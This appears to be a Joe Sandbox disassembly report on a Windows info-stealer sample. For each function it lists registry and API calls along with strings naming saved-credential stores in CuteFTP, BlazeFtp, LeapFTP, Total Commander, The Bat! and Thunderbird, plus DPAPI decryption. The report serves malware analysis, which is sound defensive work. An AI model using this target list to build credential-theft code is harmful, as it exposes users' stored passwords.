                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
                                        • API String ID: 1884169789-3073816274
                                        • Opcode ID: 85eb28852d51ee137f4f876bcd3b437eb6ae76eb9c8a67fe3c9e0e4e760741da
                                        • Instruction ID: 434a8bea75bcba08ad3bdf35e8b430fc32f87f05985e1beab70928cc1f6d5057
                                        • Opcode Fuzzy Hash: 85eb28852d51ee137f4f876bcd3b437eb6ae76eb9c8a67fe3c9e0e4e760741da
                                        • Instruction Fuzzy Hash: F62118746415087ADB112F21DD02FDE3E26EF54749F54803AB508B90E2DBBE8AE19A8C
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 004066DF
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406713
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406921
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$Port$PthR$SSH$User
                                        • API String ID: 1332880857-1643752846
                                        • Opcode ID: f262ccb685c1f36001bbccbf0626a0d0b5a134f2f977915f3876c6ced4bb526d
                                        • Instruction ID: 05b75843c333f4404470ef5bf35d0ab6282f0fbda506d4f24309e253ca2b8762
                                        • Opcode Fuzzy Hash: f262ccb685c1f36001bbccbf0626a0d0b5a134f2f977915f3876c6ced4bb526d
                                        • Instruction Fuzzy Hash: E5512732800118FADF226B50CC02BDD7AB5BF44308F11C0BAB554740B1DF7A5AE2AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040622E
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406262
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040640E
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                        • API String ID: 3369285772-3748300950
                                        • Opcode ID: ea9a0f43d5a5970f8489b364bd0e91d9156c542d7e55169b215682ce1dcdf491
                                        • Instruction ID: 659131148aa89f92dc2af5d7e5fa8bd9fb4cbf4e24194177433c4f875aa0c321
                                        • Opcode Fuzzy Hash: ea9a0f43d5a5970f8489b364bd0e91d9156c542d7e55169b215682ce1dcdf491
                                        • Instruction Fuzzy Hash: A7411931800118FADF226B51CC02BDD7ABABF44308F15C0BBB554750B1DB7A5AE6AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040745B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040748F
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407621
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Directory$Password$Server$UserName$_Password
                                        • API String ID: 1332880857-3317168126
                                        • Opcode ID: 10d0919ea7a27d91820df6147c937eed1a506e9a9e46d470f2f0eb0f3233723b
                                        • Instruction ID: 4f5650318535d5f6d1375e9c3d43e9296c133cf8e28e3780f1e4dd1ce6eb641c
                                        • Opcode Fuzzy Hash: 10d0919ea7a27d91820df6147c937eed1a506e9a9e46d470f2f0eb0f3233723b
                                        • Instruction Fuzzy Hash: D341C73185021CBADF226F51CC02BDD7AB6BF44308F14C4BAB558750B1DB7A5BA1AF89
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCCB
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCFF
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                        • API String ID: 1332880857-1017491782
                                        • Opcode ID: c43f1d90e4887b0af196a567718d2be2001fb2e678ee16e351542723792f9939
                                        • Instruction ID: 7a1adc70422084839155d7d8ad19170be227c19b2048ea9f3bb5b258fe072799
                                        • Opcode Fuzzy Hash: c43f1d90e4887b0af196a567718d2be2001fb2e678ee16e351542723792f9939
                                        • Instruction Fuzzy Hash: C941BA31910118BADF626F91CC02BDD7AB6BF04304F1084BAB558740B1DF7A9AA5AFC8
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407686
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004076BA
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040784C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                        • API String ID: 1332880857-980612798
                                        • Opcode ID: f036d2a4b70bf2c83cef8162802ec2a3813d7afb5a23d2c589f4d7b709d46e09
                                        • Instruction ID: 7fd49fa6dd1ba017d1e65fcc213092edd53ce26c958e1ff1ff116aff25b23559
                                        • Opcode Fuzzy Hash: f036d2a4b70bf2c83cef8162802ec2a3813d7afb5a23d2c589f4d7b709d46e09
                                        • Instruction Fuzzy Hash: D641B93184421CBADF226F51CC02BDD7AB6BF44308F14C4BAB558750B1DB7A6AD1AF89
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 004064C6
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004064FA
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040668F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostDirName$HostName$Password$Port$Username
                                        • API String ID: 1332880857-791697221
                                        • Opcode ID: f2327fd69b61082d22dc8b96d52e98a2777f97c9e20f268e4d59f120f848cbf8
                                        • Instruction ID: d74ba574a7403947e9da4afaf0816161fc1f6544ea8ec8891c99de68f7f5397d
                                        • Opcode Fuzzy Hash: f2327fd69b61082d22dc8b96d52e98a2777f97c9e20f268e4d59f120f848cbf8
                                        • Instruction Fuzzy Hash: 2A41CA31840118FADF226B51CC06BDD7AB6BF44308F15C4BAB554740B1DF7A5AE2AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D894
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D8C8
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040DA4B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$Pass$Port$Remote Dir$User
                                        • API String ID: 1332880857-1775099961
                                        • Opcode ID: 3fe09a3da9aced8f76b67c3d01656c318c349a614dede48044dd2060b2724a01
                                        • Instruction ID: 1b56fd96a8bc7484c712172b162c79db69b0935e68cb7cc8b1d1ed471d885e34
                                        • Opcode Fuzzy Hash: 3fe09a3da9aced8f76b67c3d01656c318c349a614dede48044dd2060b2724a01
                                        • Instruction Fuzzy Hash: 9641CB31940119BADF227B91CC02BDD7AB6BF44308F14C0BAB558740B1DB7A5A96AF98
                                        APIs
                                        • StrStrIA.SHLWAPI(00542E18,BlazeFtp), ref: 0040CB08
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                        • API String ID: 1884169789-2976447346
                                        • Opcode ID: e570d7787626a09a0829d2cc7acc607ec1111b59b37f083f6410b3172a5ad351
                                        • Instruction ID: fa58062dc89e8d8c6eba8e248f6b3770d8bda9bc2d5fac131e608830897907ea
                                        • Opcode Fuzzy Hash: e570d7787626a09a0829d2cc7acc607ec1111b59b37f083f6410b3172a5ad351
                                        • Instruction Fuzzy Hash: 6731087194020ABADF126BA1CC06FEE7E32AF84748F11413BB510741F2D77A5A91AB48
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403301
                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403312
                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403333
                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040334A
                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040335B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocLocal
                                        • String ID: Content-Length:$Location:
                                        • API String ID: 2140729754-2400408565
                                        • Opcode ID: 1ff60d320efae8d8fd6a8f89dd9caa27ee76eb4b5e181dd29503af328c8fd158
                                        • Instruction ID: 0dc70e399785ca8dc68f2f9f5be05bd85ac4a8be2f0b5de4bed7d03bef632bdd
                                        • Opcode Fuzzy Hash: 1ff60d320efae8d8fd6a8f89dd9caa27ee76eb4b5e181dd29503af328c8fd158
                                        • Instruction Fuzzy Hash: D941E535A04249BBDB10AFA1CC85B9EFF79EF41309F20817BB510B51E1DB7D9A819618
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00407031
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00407065
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00407206
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: Hostname$Password$Port$Username
                                        • API String ID: 3369285772-1811172798
                                        • Opcode ID: a41d979360f7e32c87eedb7931e3886f743bbd8ddd06f8d10cae3088f2593e3b
                                        • Instruction ID: 6516cce8fb95ef8718eb39ae74a5b48e395b1ccc0a8d9f0c1ebf5f7c45b768d3
                                        • Opcode Fuzzy Hash: a41d979360f7e32c87eedb7931e3886f743bbd8ddd06f8d10cae3088f2593e3b
                                        • Instruction Fuzzy Hash: 7C413A7280011CEADF216B50CC06BDD7ABABF44308F00C0BAB554741E1DF7A5AD2AF99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406DFD
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406E31
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406FA6
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: FtpPort$Password$Server$Username
                                        • API String ID: 3369285772-1828875246
                                        • Opcode ID: 24c40d2f2cfbbb02112a3b83b71eb3fa2959930d61feeba99e5e60d278ee1cd6
                                        • Instruction ID: 7b7708260c288e77f5b8bca963c71f9da4941e60b0aee441a244f3ed0216979d
                                        • Opcode Fuzzy Hash: 24c40d2f2cfbbb02112a3b83b71eb3fa2959930d61feeba99e5e60d278ee1cd6
                                        • Instruction Fuzzy Hash: AA411932800219FADF216B51CC06BDD7AB9BF44308F15C0BAB554740B1DB7A5AE2AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E505
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E635
                                          • Part of subcall function 0040465C: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004046A8
                                          • Part of subcall function 0040465C: LocalFree.KERNEL32(00000000), ref: 004046DC
                                          • Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                        • String ID: Folder$Port$Site$UserID$xflags
                                        • API String ID: 2167297517-269738940
                                        • Opcode ID: 447ebd8c7e1c7175461460fc7f64bb9faa2806f197a07f167ac23d59bb9403e2
                                        • Instruction ID: 4074b47011b42a884ba02d5608bbd2b1e10f8c966accfa876ff4afdc1c20ff64
                                        • Opcode Fuzzy Hash: 447ebd8c7e1c7175461460fc7f64bb9faa2806f197a07f167ac23d59bb9403e2
                                        • Instruction Fuzzy Hash: 9931A93181021ABADF126FD1CC06BEE7B72BF54348F50883AB521751F1D77A9A61EB48
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BA7
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407BDB
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407CF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                        • API String ID: 1332880857-3870687875
                                        • Opcode ID: 1a63c92e64cf8971359510c085174154593fb8da296ae2ab1caed5cf57ebadb2
                                        • Instruction ID: e015fb7150b4fef979a4cbd31ffdff19fc3bd018de425a573e9a50aeac1ce165
                                        • Opcode Fuzzy Hash: 1a63c92e64cf8971359510c085174154593fb8da296ae2ab1caed5cf57ebadb2
                                        • Instruction Fuzzy Hash: 5631F87190421CFADF216B50CC42BDD7ABABF44308F1080BAB658750A1DB796B91AF89
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040FB5B
                                          • Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                          • Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                          • Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                          • Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040FBA0
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040FBBB
                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040FC00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                        • API String ID: 3062143572-138716004
                                        • Opcode ID: c73157dc42e351fe24aeac53d210d4cbaf8a01f958b5b4d604d304093ba6a40b
                                        • Instruction ID: 986410cbbe359704e9777fd14a99ec1d9ac4ba3d65956af62eaa0ac6e1f8db38
                                        • Opcode Fuzzy Hash: c73157dc42e351fe24aeac53d210d4cbaf8a01f958b5b4d604d304093ba6a40b
                                        • Instruction Fuzzy Hash: 2C114FB0680319BADB10EF51CC53FD83A689B50744F214076B608B50E3DBF9AAD0CB5C
                                        APIs
                                        • StrStrA.SHLWAPI(00542E18,unleap.exe), ref: 00407D7D
                                        • lstrlenA.KERNEL32(unleap.exe,00000001,00542E18,unleap.exe), ref: 00407D92
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        • StrStrIA.SHLWAPI(00541FA8,leapftp,00542E18,unleap.exe), ref: 00407DD6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                        • API String ID: 1884169789-1497043051
                                        • Opcode ID: 9ff28a2ddcddeda16e660b6ff56c27802fee60b2161290d0ca876d338eb3d0ca
                                        • Instruction ID: 7b98be79f81809e709d9a4bce74438115821991d7e5517fbbb381e1f428634a5
                                        • Opcode Fuzzy Hash: 9ff28a2ddcddeda16e660b6ff56c27802fee60b2161290d0ca876d338eb3d0ca
                                        • Instruction Fuzzy Hash: E521B470904504BAEB112B21CC02FEA3E179F80354F24443BB905751E7CBBD5FD2929D
                                        APIs
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        • wsprintfA.USER32 ref: 0040F329
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocalwsprintf
                                        • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                        • API String ID: 988369812-1921698578
                                        • Opcode ID: a3ef6d431f80d817ff1cd45ed05f25d3501f438ee6e2fc4bcdb6460b9f72d230
                                        • Instruction ID: 9536a26f62d87d92dda95ff7fa96823146c1e7de4262c71b9d30f957717cf2e5
                                        • Opcode Fuzzy Hash: a3ef6d431f80d817ff1cd45ed05f25d3501f438ee6e2fc4bcdb6460b9f72d230
                                        • Instruction Fuzzy Hash: B131F771D00208FADF11BBA1CD42ADDBB72AF00758F20807BB924B55E1D7799F58AB48
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404F10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDirectoryLocalWindows
                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                        • API String ID: 3186838798-3636168975
